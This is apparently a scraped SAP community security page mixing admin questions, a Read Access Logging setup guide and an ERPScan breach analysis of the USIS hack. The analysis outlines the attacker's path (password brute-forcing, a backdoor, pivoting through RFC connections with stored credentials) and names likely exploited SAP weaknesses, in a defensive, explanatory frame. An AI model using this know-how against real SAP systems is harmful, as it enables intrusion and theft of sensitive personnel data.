Hi,

There is a requirement, when new authorization object is created in SU21 then alert or mail will sent to security team every time? Is their any BADI or Exit available to write the code? or Is there any standard workflow task that we could cover this requirement?

Thanks and Regards

Sudarshan Gaikwad

Good day,

I would like to list users with their roles and transaction codes. I do not find any option in SUIM that can display them in a single page where I can print them out easily. Is this possible?

Thanks!

Hi All,

We have configured few queries against 'X' user ID but unfortunately the access to SQVI for 'X' user ID has been revoked.

So can anyone let me know is it possible to see those queries and the configuration made against those queries.

Thanks in Advance!

Regards,

Ali

Hi experts..

help me if I want to delete bunch of roles for a Single User??

What is the process to request that SAP remove or deactivate a Developer Key from a a specific user so that it is no longer valid or associated with that user.    Any input would be most appreciated.

Thank you, Jane Landreth

Hi all,

After kernel 721_EXT_500 upgrade, i am not able to see Security audit logs in sm20. However logs are generating at OS level.

i have observed after kernel upgrade at OS level audit file format was changed in to  ++++++++######.AUD   before it  was audit_+++++++. Then accordingly i have set the below parameters

after change the FIN_AUDIT parameter , i can see the logs only after kernel upgrade. but i want to see the  full logs before and after kernel upgrade.

appreciate your  quick response

Regards,

Raghav.

.

Attack Detection Patterns of SAP Enterprise Threat Detection

Attack detection patterns are what powers the ability of SAP Enterprise Threat Detection to alert you to suspicious activity in your network. Read Michael Shea’s blog for an overview of the kind of patterns we deliver with our product. May 7, 2015

Join the SAP Enterprise Threat Detection Customer Engagement Initiative

Join our Customer Engagement Initiative for SAP Enterprise Threat Detection that helps you to detect cyberattacks against SAP systems and non-SAP systems in real-time. You will be able to influence product development and get early insight into upcoming innovations. Find out more and contact Carmen Graf to register. April 16, 2015

Join the SAP Cloud Identity Service Customer Engagement Initiative

Join our Customer Engagement Initiative (CEI) 2015 for SAP Cloud Identity service and influence our product development in collaboration with your peers! For more details go to the CEI “Enhance Functionality for SAP Cloud Identity Service” and contact Donka Dimitrova to register. March 13, 2015

when we select the Users by Complex Selection Criteria in suim tcode

for any transaction Code like su01 or FK04 etc.

In header we are not getting description for transaction code in

selection criteria . please check attached screen shot for reference

please check and suggest ASAP what need to be done to enable the same

as require for audit prospective .

Thanks in advance !

On 11th of May, a security headline broke out in the news, it was about an attack on USIS (U.S. Investigations Services) conducted potentially by Chinese state-sponsored hackers via a vulnerability in SAP Software. Hackers broke into third-party software in 2013 to open personal records of federal employees and contractors with access to classified intelligence, according to the government's largest private employee investigation provider [1].

USIS is a federal contractor which conducts background checks for DHS - the largest commercial provider of background investigations to the federal government. It has more than 5,700 employees providing services in all 50 states and U.S. territories and overseas. As the result of the breach, more than 27,000 personnel seeking security clearances likely were affected. Similar hacks also affected servers at the Office of Personnel Management (OPM), which holds information on security clearance investigations. Once hackers have a list of employees who possess government security clearances, they can exploit other aspects of those employees’ lives for malicious gain.

Within a couple of hours after information that it was a SAP vulnerability we contacted with journalists of DarkReading and gave them feedback and some comments.

Now we sharing all comments that were prepared as well as additional research conducted by us, to tell you what can be the next steps for organizations to secure their systems and prevent these attacks.

Below you can find the timeline of this attack investigation, the collection of historical facts from different resources, and our comments on the topic.

Attack timeline

Late 2013

Initial Attack against USIS Supplier potentially started [2].

March 2014

Attack continued against USIS [3].

Both USIS and OPM were hacked around March 2014, and while the security controls in place at OPM’s networks shielded employee information, the networks at USIS were not as secured. At USIS, hackers deployed spyware designed to capture screenshots when a background check window was open,

- said Stroz Friedberg, Digital Forensic.

Hackers infiltrated a network belonging to one of USIS’s suppliers that stored enterprise resource planning software. That network was connected to USIS’s network.

According to NextGov, “the attacker was able to navigate from the third-party-managed environment into the USIS network in late (redacted) by successfully brute-forcing a password on an application server,” - wrote Padres, referring to a hacking technique that systematically checks all possible passwords. “Once the attacker was able to log in to that server, the attacker installed a malicious backdoor.”

June 05 2014

USIS reported about the cyberattack to federal authorities on June 5, more than two months before acknowledging it publicly [4].

July 09 2014

It was published, that Chinese hackers in March broke into the computer networks of some United States government agency that houses the personal information of all federal employees. But officials also said that neither the personnel agency nor Homeland Security had identified any loss of personally identifiable information [5].

August 06 2014

USIS published the press release stating that they were hacked. And potentially it was a state-sponsored attack. They also hired independent Forensic investigation company - Stroz Friedberg to perform an investigation [6].

August 22 2014

Detailed information about the breach appeared in the news.

The agency has identified some 25,000 employees whose information it believes were exposed in the breach. While the number of employees affected is relatively small compared to breaches at retailers such as Target or Home Depot which have affected tens of millions of customers, nonetheless quite serious,

– one of DHS officials told Reuters.

Files on background checks contain highly sensitive data that foreign intelligence agencies could attempt to exploit to intimidate government workers with access to classified information.

This information includes Social Security numbers, education and criminal history, birth dates along with information about spouses, other relatives and friends including their names and addresses. [7]

November 03 2014

First detailed information about the attack appeared on Associated Press website. At this time without any details that attack on SAP ERP System was used for conducting attack [8].

“A cyberattack similar to previous hacker intrusions from China penetrated computer networks for months at USIS, the government's leading security clearance contractor, before the company noticed, officials and others familiar with an FBI investigation and related official inquiries.

The breach, first revealed by the company and government agencies in August, compromised the private records of at least 25,000 employees at the Homeland Security Department and cost the company hundreds of millions of dollars in lost government contracts. In addition to trying to identify the perpetrators and evaluate the scale of the stolen material, the government inquiries have prompted concerns about why computer detection alarms inside the company failed to quickly notice the hackers and whether federal agencies that hired the company should have monitored its practices more closely,” – told The Associated Press [9].

In the private analysis prepared for USIS by Stroz Friedberg, a digital risk management firm, managing director Bret A. Padres said the company's computers had government-approved "perimeter protection, antivirus, user authentication and intrusion-detection technologies." But Padres said his firm did not evaluate the strength of USIS' cybersecurity measures before the intrusion.

So, what we can learn from that statement “government inquiries have prompted concerns about why computer detection alarms inside the company failed to quickly notice the hackers”?

As we have mentioned in many reports, SAP Security, much like any business application security area is rarely covered by traditional security tools such as vulnerability management and intrusion detection systems. SAP has very specific vulnerabilities and configuration issues that should be assessed by high-quality experts. To give you an example, there are thousands of parameters related to security in each SAP System just in application server. In addition to that, there were 3300+ vulnerabilities found in SAP from 2001 till 2015. Also, if we continue to speak about complexity, there are 1200 web services installed by default on SAP NetWeaver 7.2 (SAP’s application server), each web service is like a small website. So, you can get an idea of the complexity of this system and how many issues there can exist. Needless to say that “complexity kills security”. Even after the latest SAP’s marketing campaign “SAP is Simple” (which is a great idea), it will take you years to make it really simple with such amount of legacy systems.

November 04 2014

New information appeared in the news [10].

The hackers attacked a vulnerable computer server in a connected but separate network, managed by a third party not affiliated with USIS,

- said Padres, Forensic Company.

Now we learned, that the actual attack was conducted via separate network owned by 3rd party, but still nothing special about how exactly it has happened.

April 28 2015

After almost 5 month of silence, finally some new information appeared, and this was the first resource where we found information that pointed us to the fact that the initial attack was against ERP System. And this ERP System was on the separate network managed by separate company. [11]

Hackers infiltrated a network belonging to one of USIS’s suppliers, which stored enterprise resource planning software. That network was connected to USIS’s network. [12]

The attacker was able to navigate from the third-party-managed environment into the USIS network in late (redacted) by successfully brute-forcing a password on an application server,

– wrote Padres.

When we speak about business applications, we need to consider their highly interconnected nature. You can’t just implement dozens of business applications in a company and leave them unconnected. For example, to automate business processes, your ERP system should be able to automatically create an invoice in banking system, so these systems should be somehow connected on application layer even if they are separated by network. In the real life we see dozens or even hundreds of connections between different SAP Systems, and some of these connections (so-called RFC Destinations) store usernames and passwords (according to our statistics, average number of connections in SAP System is about 50 while 30% of them usually store usernames and passwords).

Once an attacker gets an access to the weakest SAP System, he can easily get access to connected systems and from them to others, so on and so forth spreading his access like a spider’s web.

Another way how business applications can be connected is via Enterprise Service Bus, such as SAP PI, or process integration system, these systems also have vulnerabilities as reported by ERPScan Research team during BlackHat 2013 conference.

Finally even direct connections don’t exist, there is a research conducted by ERPScan Research team, with explanation of SSRF attack that can be used to bypass firewall restriction and attack systems using their trust connections [13].

Taking into account those connections, it comes as no surprise that attackers were able to get access to the connected network of another company.

Finally we would like to say that those connections can be even more dangerous if we talk about Manufacturing, Oil and Gas and Nuclear companies, where SAP can be connected with Field devices and Plant Floor.

May 10 2015

From the previous article we may make a decision that this ERP system was most probably SAP as the most popular one, and the new article confirmed this fact. NextGov became the first resource to tell that it was actually SAP.

“That software apparently was an SAP enterprise resource planning application. It’s unclear if there was a fix available for the program flaw at the time of the attack. It’s also not clear whether SAP—which was responsible for maintaining the application—or USIS would have been responsible for patching the flaw.

But in the end, sensitive details on tens of thousands of national security personnel were exposed in March 2014.

Assailants infiltrated USIS by piggybacking on an “exploit,” a glitch that can be abused by hackers, that was “present in a widely used and highly-regarded enterprise resource planning (‘ERP’) software package,” an internal investigation obtained by Nextgov found. USIS officials declined to explicitly name the software application, saying they would let the report, compiled by Stroz Friedberg, a digital forensics firm retained by USIS, speak for itself.” [14]

This report also includes a try to look deeper into SAP vulnerabilities and make a guess what has happened:

During the period of the hacking operation, which began in 2013 and was exposed in June 2014, 20 to 30 new critical vulnerabilities were identified in SAP’s enterprise resource planning software [15].

From our point of view, real figures about potential vulnerabilities are much larger. If we assume that real attack was conducted in 2013, let’s say on the beginning of the year, the actual number of vulnerabilities patched by SAP from 2001 to the middle of 2013 were about 2000, according to the research “SAP Security in figures 2013” [16] based on information from SAP Support portal about all vulnerabilities.

The number of SAP vulnerabilities would have given attackers many options to target SAP directly, based on how USIS deployed the ERP tool,” - said Richard Barger, chief intelligence officer at ThreatConnect, former Army intelligence analyst.

This is more than true. In addition, more than 2000 potential vulnerabilities existed in SAP Applications, there also can be some vulnerabilities in custom programs developed by USIS subcontractor or even another 3rd party.

It is unclear which vulnerability the intruders exploited. Defects in programs used by the government and contractors sometimes aren’t fixed for years after software developers announce a weakness.

May 11 2015

Some other details appeared[17].

Lawmakers have been pressing for answers about the breach since last year. Suspected Chinese hackers got into the USIS systems in late 2013 but weren’t discovered until June 2014. It is totally not surprising us. Some of the companies that we had a chance to assess don’t have any visibility to their systems. According to our research, only 10% of customers really configure and analyze SAP Security logs and other events.

May 12 2015

An article from DarkReading where we gave our first comments regarding this breach.[18]

So now, you can get the full picture of attack, and there is only one question left – how this attack was conducted. Let’s try to answer it.

What kind of vulnerability was exploited?

The news states that the vulnerability is “present in a widely-used and highly-regarded enterprise resource planning (‘ERP’) software package”

No other details about the vulnerability were provided.

Let’s try to understand what kind of vulnerabilities were used in this attack, but first of all let’s look at the history. We provide annual reviews about SAP Vulnerabilities, these reports usually called “SAP Security in figures”

• 2011. SAP SECURITY IN FIGURES 2007-2011 [19]
• 2013 SAP SECURITY IN FIGURES 2007-2011 [20]
• 2014 Analysis of 3000 SAP Security notes [21]
• 2015 Blog post with latest review [22]

From those reports we can get information about most critical vulnerabilities. Taking into account that the attack has happened in late 2013, only the first three reports will be relevant for us.Another guideline provided by ERPScan Research team is focused on most popular vulnerabilities, taking into consideration their criticality as well. So, combining data from these reports we can give an overview of vulnerabilities that were most probably used in this attack. And even if this assumption won’t be true, we will anyway get the list of most critical and popular vulnerabilities affecting SAP ERP Systems. The fact that we are mostly looking for SAP ERP vulnerabilities also should be taken into account.We also excluded most of the vulnerabilities that can be used only with combination with others, most of the specific vulnerabilities, and those vulnerabilities that require some user’s actions such as XSS. So finally we collected 15 vulnerabilities that are most likely were used against ERP System in this period of time and can give attacker and easy way to get full access to vulnerable SAP System.And finally we limited the list of vulnerabilities by publication date and select only those which were published before Q2 2013.We add a couple of parameters to each vulnerability to calculate final likehood that this particular vulnerability was used.

• Criticality– Real impact to system, such as full administrative access or just an information disclosure.
• Popularity– Amount of information in public sources such as presentations, whitepapers, and advisories with vulnerability description.
• Ease of exploitation– If there is a publically available free tool with exploit, or exploit, or POC, or advisory, or some kind of details.
• Applicability– our personal thoughts if this vulnerability is applicable to particular system that has been used in organization.
• Likehood– overall probability that this particular vulnerability was exploited based on previously mentioned parameters.
• 
  

Below is the table with details of our analysis.

So, most likely the vulnerability that was used was one of those:

• Default passwords for administrative users
• RFC Gateway remote command execution
• SAP/Oracle REMOTE_OS_AUTHENT
• Remote code execution via TH_GREP
• Unauthorized access to SAP Management console

Prevention

We recommend you to implement some of the most critical SAP Security Notes, which were probably used during this attack, which listed in the table provided in the previous chapter.Secondly, follow our guidelines [23] for initial assessment of SAP NetWeaver ABAP Application server – 33 Most critical security checks.Thirdly, check this presentation, as well as all other slides and guidelines [24] about SAP Security and you are also welcome to follow us during security conferences worldwide. Here is the list of nearest events.

Recommendations

Since all steps discussed previously require a lot of workforces, we recommend you to check automatic solutions to assess and secure your system as soon as possible, as nobody knows, if your system is not under attack.

Takeaways for CISOs are:

As you see, when some researchers start flagging security loopholes by publishing information about one or another system's security vulnerability, it's only a matter of time before cyber criminals actually exploit it. Who will fall victim to be anybody guess. So, apart from the fact that it's better to take precautionary actions before a real example surfaces, we started to talk about this 8 years ago.Our lessons are simply three:

• You can't only trust traditional security solutions when we speak about advanced cyber attacks.
• You can't be sure that everything is ok in your network unless you really monitor it from all angles, if we talk about SAP it means that VA, Custom code security, SOD and event monitoring - all areas should be on the radar.
• And the most important for business applications is that they are highly connected within each other, and as you see in this example, and it's not only the problem of your infrastructure security, it's also a problem of all your external connections and 3rd party security.

So what it boils down to is that "a system is only as secure as its weakest link".

References

1. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

2. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

3. www.homelandsecuritynewswire.com%2Fdr20150430-breach-of-backgroundchecks-database-may-lead-to-blackmail

4. http://www.theblaze.com/stories/2014/11/04/cyberattack-on-top-u-s-govt-security-contractor-went-unnoticed-for-months/

5. http://www.nytimes.com/2014/07/10/world/asia/chinese-hackers-pursue-key-data-on-us-workers.html?_r=0

6. http://www.usis.com/media-release-detail.aspx?dpid=151

7. http://www.reuters.com/article/2014/08/22/us-usa-security-contractor-cyberattack-idUSKBN0GM1TZ20140822

8. http://bigstory.ap.org/article/427fbd5d88f5481eab35f5a8bbc534be/security-contractor-breach-not-detected-months

9. http://bigstory.ap.org/article/427fbd5d88f5481eab35f5a8bbc534be/security-contractor-breach-not-detected-months.

10. http://www.theblaze.com/stories/2014/11/04/cyberattack-on-top-u-s-govt-security-contractor-went-unnoticed-for-months/

11. http://www.ladailypost.com/content/background-checks-database-breach-heightens-blackmail-risk

12. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

13. http://erpscan.com/wp-content/themes/supercms/Publications/SSRF%20vs%20Businness%20critical%20applications%20final%20edit.pdf

14. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

15. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

16. http://erpscan.com/wp-content/themes/supercms/Publications/SAP%20Security%20in%20figures%20-%20A%20global%20survey%202013%20RC.pdf

17. http://thehill.com/policy/cybersecurity/241588-report-hackers-infiltrated-security-contractor-using-third-party

18. http://www.darkreading.com/attacks-breaches/first-example-of-sap-breach-surfaces/d/d-id/1320382

19. http://erpscan.com/wp-content/themes/supercms/Publications/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf

20. http://erpscan.com/wp-content/themes/supercms/Publications/3000-SAP-notes-Analysis-by-ERPScan.pdf

21. http://erpscan.com/wp-content/themes/supercms/Publications/3000-SAP-notes-Analysis-by-ERPScan.pdf

22. http://erpscan.com/press-center/blog/sap-vulnerabilities-highlighted-in-many-reports-such-as-hp-cyber-risk-report-2015/#more-7858

23. http://erpscan.com/wp-content/themes/supercms/Publications/EASSEC-PVAG-ABAP.pdf

24. http://erpscan.com/white-papers/

Hello experts,

We are switching from Seclog to RAL (after an upgrade).

In this context our customer has asked us if it is possible to replicate the RAL logs to a remote site, so a internal hacker isn't able to clear his tracks by deleting RAL logs from fx. OS level.

They want us to replicate to a customer secure site.

Is this supported directly in RAL or do we have to make a manual DB replication of relevant tables?

Cheers,

Kenneth

Introduction:

Read access logging is one of the powerful tool to secure data. With help of this SAP out-of-the box solution, you can monitor data that is being accessed via SAP Dynpro, WebDynpro, RFC and Web-service channels.

In this document, I would like to share step-by-step guide to configure Dynpro application. Please check SAP Note 1969086 for release information of Read access logging. You need to have specific roles to configure the application.

Steps to configure Dynpro application:

1. Access Read access logging screen with SRALMANAGER transaction code

2. Click on Logging Purposes

Note: A way to classify each log entry. For example, “Privacy” or “Finance records”.

3. Click on “Create”

4. Enter data and click on “Create” to close pup-up

5. You can see new purpose in “Purposes” screen. You can delete it or change name and description of it.

     Note: You may want to re-use existing “purpose” for your configuration.

6. Come  to home screen and click on “Log domains”

7. Click on “Create”

     Note: This is where you define semantic identification of data, before the actual fields and rules are

     defined

8. Enter data in below fields and click on “Create” to close pop-up

9. You will see newly created domain in “Log Domains” screen

10. Come back to the home screen.

11. If you want to configure Read access logging for “SAP GUI screens” or “WebDynpro” screens then you should record fields of those screens – before actual configuration. To do that, click on “Recordings”

     Note: This step is not required for RFC or Web-service channel.

12. Click on “Create” to start new recording.

13. Select the “Channel” from drop down and any new name for recording as shown below.

14. Click on “Create” to close the pop-up. As you can see under “State” column – Recording is active for system (all SAP GUI transactions/screens)

Note: You need not to press “Ctrl” for table columns. Also, there is no additional configuration/development required to get “Record Field” option in context menu.

The log context is the UI element that other UI elements within the logging session depend on.

SAP help link for more details:

https://help.sap.com/saphelp_nw74/helpdata/en/fd/4d2551b7dd2314e10000000a44176d/content.htm

List of fields for which you want to enable read access logging

You can apply conditions for read logging. Ex: Exclude user ABCUSER from logging

List of fields that you recorded (or list of interface parameters in case of RFC or Webservice), Messages, Ok Codes and system fields for user name, screen title and transaction code

Select ‘Input’ from dropdown (or whichever is appropriate for your application)

.    

Conclusion:

This is E2E basic configuration for sample application. However, we can increase the scope of configuration with log context, log groups and conditions based on the application that we are dealing with. You can configure the webdynpro application with same approach.

Regards,

Naveen Inuganti

Hello,

We're currently doing an upgrade from Release 700, SP-Level 014, to Release 701, SP-Level 016.

In our CRM system, I'm trying to edit the authorization object S_RFCACL so I can add new SIDs. I'm having particular issues with the field RFC_SYSID.

The problem I'm getting is:

1) The object isn't allowing me to enter any values, and won't display existing values

2) The object parameter options are completely different from the previous version.

Here are screenshots of the options in the previous version compared to the new version.

Old parameter options:

New parameter options:

Can anyone advise what needs to be done to get this working? Is there a note that needs to be applied?

Much appreciated.

Cheers, Paul

I have observed this strange behavior in my system, the change document is not shown if I run the report for attribute 'user type' when the user type has actually been changed. This happens for output-change history list. For other output types the result is shown. How can I fix this?

Hello All

Purpose: Prevent users to access confidential attachments in XK03 which contains bank account details - SSN etc., I tried to check through all existing forums, solutions etc. but please pardon if there is an obvious solution that I might have missed.

I tried multiple approaches:

(a) Option A is to secure at source - when vendor admin is uploading the attachment containing SSN details, please make sure to mask/block/encrypt whatever it takes to not to make SSN public for general consumption.

(2) Option B - OB23 -> this seems to help to suppress data at field level while we are focusing specifically on attachments

(3) Object F_LFA1_GRP -> vendor account group - can we create an account group for confidential vendors ->  potentially not an option as I understand all account groups can have confidential attachments, again its not about restricting access to account groups information just the attachments across all account groups.

(4) F_LFA1_BUK - on basis of company code - seems not relevant as behavior of authorization access to GOS should remain consistent across all company codes

(5) S_GUI -> seems plausible - if an user doesn't have authorization to download/upload/print - they can't actually view the attachments since they can't either upload/download/print of display from attachment list option.

But this object is too generic to be used for a particular t-code and one solution with least amount of customization is to link XK02/XK03 GOS functionality with an custom S_GUI (though I know sound of "custom s_gui" isnt pleasing at all) which doesn't allow document upload/download/print for users who should only have XK03 access while provides access to vendor admins who need access to upload attachments via XK02

(6) S_OC_ROLE - this object allows adding/deleting attachments for an user in GOS but you can only upload if you have S_GUI and can really view if you have S_GUI (seems I am own remote desktop - would that be an reason that S_GUI is coming into play heavily - I dont think so - thinking out loud)

(7) S_GOS_ATT - this is the first authorization object to be checked for authorizations to change/delete attachments from attachment list - and if an user doesnt have this object then next check is placed on S_OC_ROLE as per my investigation, (SAP NOTES: 1293080 and 1539457). This object only has 02/06 at activity level.

so based on investigation, most suitable solution at this stage based on initial research involves creating an custom s_gui, only giving access to vendor admins to this object, modify the GOS function module for XK02/XK03 to place authority check on this object, update su24 (all the usual std. steps etc. etc.), and not allow XK03 only user (i.e users who are only meant to display and are not vendor admins) to not to have S_GOS_ATT for object LFA1 (Vendor data) and also not to allow them access to S_OC_ROLE so that they dont delete/ any uplaoded attachments even by mistake.

Still better and most natural solution would have been to add an activity 03 in object S_GOS_ATT and allow display of data only through this object .. thinking if I should raise a SAP OSS incident to allow for this functionality ?

Please share your experiences/approach and thanks for your time!

Hello Experts,

Would there be an alternative for Cross system role comparison outside of using RSUSR050 ?

We have a variety of landscapes and are on different basis levels...SAP notes have corrected all but one

which is older release level- business not ready to upgrade this one

I have dabbled with SCMP tcode but results are not clear or complete. I was using table AGR_1250 and 1251

?

Any thoughts appreciated ..

Dan.